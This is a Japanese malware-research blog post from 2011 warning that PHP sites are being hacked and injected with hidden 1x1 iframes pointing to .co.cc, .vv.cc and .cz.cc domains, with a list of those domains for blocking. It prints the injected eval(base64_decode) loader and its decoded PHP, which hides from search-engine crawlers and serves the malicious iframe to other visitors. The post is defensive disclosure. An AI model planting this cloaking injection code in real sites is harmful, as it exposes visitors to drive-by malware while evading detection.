土曜日, 2月 26, 2011

「.co.cc」PHPサイトのiframe攻撃が流行っている


大体8時間前にこのアタックが発見されています。
攻撃されているホームページにはPHPがインストールされてます。
PHPのセキュリティ問題を使われてサイトをハックされてindexページにマルウェアコードを追加されています。下記詳しい情報となります↓

攻撃ベクター
「.co.cc、.vv.cc、.cz.cc、など」の関係iframe code攻撃が発見

サンプルiframeコードは↓
<iframe src="http://hgerwhu45xxx.co.cc/QQkFBg0AAQ..=" width=”1″ height=”1″>
又は
<iframe src="http://gqgqhfdjdhxxx.co.cc/QQkFBg0AAQ..==" width=’1` height=`1″>

ドメイン一覧は下記となります、20%しかブラックリストに登録されてません、!!危険なドメインです!!下記のドメインのウェブトラフィックがあったらブロックをするえきです。
berfry43bgrbf.vv.cc
burifym.cz.cc
drelagda.vv.cc
g243gtdsgsdg.vv.cc
glkgj5j4rshdfhj.vv.cc
gqgqhfdjdh.co.cc
gs34grsgdg.vv.cc
gsdg3gsdgsdg.vv.cc
gsg3gsdgsxgsdg.vv.cc
gwsg3gsgdsgd.vv.cc
hdsh4hsfhdsj.vv.cc
hgerwhu45.co.cc
hndfdfnfdnxdnf.vv.cc
jfgdhdfhsdfh.vv.cc
jfgjfr5jdfj.vv.cc
keleghma.vv.cc
kulawield.vv.cc
maridora.vv.cc
miraswyn.cz.cc
mkgk5jswhgfnxg.vv.cc
oghmalak.vv.cc
siranaya.vv.cc
lookfeel-201101.co.cc

コードをダウンロードされたら下記のように↓
<?php eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNC…
c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycm
F5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGl…
kYXRvcicsJ3NsdXJwJywnZG9jb21vJywne
WFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW…
5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJ… >

デコードしたら下記となります↓
error_reporting(0);
$bot = FALSE ;
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex',
'mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com',
'anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools',
'arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent',
'download master','drupal.org','vlc media player',
'vvrkimsjuwly l3ufmjrx','szn-imageresizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');
$stop_ips_masks = array(
array("216.239.32.0","216.239.63.255"),
array("64.68.80.0" ,"64.68.87.255" ),
array("66.102.0.0", "66.102.15.255"),
array("64.233.160.0","64.233.191.255"),
array("66.249.64.0", "66.249.95.255"),
array("72.14.192.0", "72.14.255.255"),
array("209.85.128.0","209.85.255.255"),
array("198.108.100.192","198.108.100.207"),
array("173.194.0.0","173.194.255.255"),
array("216.33.229.144","216.33.229.151"),
array("216.33.229.160","216.33.229.167"),
array("209.185.108.128","209.185.108.255"),
array("216.109.75.80","216.109.75.95"),
array("64.68.88.0","64.68.95.255"),
array("64.68.64.64","64.68.64.127"),
array("64.41.221.192","64.41.221.207"),
array("74.125.0.0","74.125.255.255"),
array("65.52.0.0","65.55.255.255"),
array("74.6.0.0","74.6.255.255"),
array("67.195.0.0","67.195.255.255"),
array("72.30.0.0","72.30.255.255"),
array("38.0.0.0","38.255.255.255")
);
$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
foreach ( $stop_ips_masks as $IPs ) {
$first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
}
foreach ($user_agent_to_filter as $bot_sign){
if (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
}
if (!$bot) {
echo '<iframe src="http://hbaehanxxxxxcencorxxxxfznjfh.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAwcCAQMMAw==" width="1" height="1"></iframe>';


あなたのPHPバーションが大丈夫ですか?CMSソフト例えばvB又はWordPressがこの攻撃の目的ですが、ご確認して下さい。
---
ゼロデイ・ジャパン
http://0day.jp
マルウェア研究所

0 件のコメント:

コメントを投稿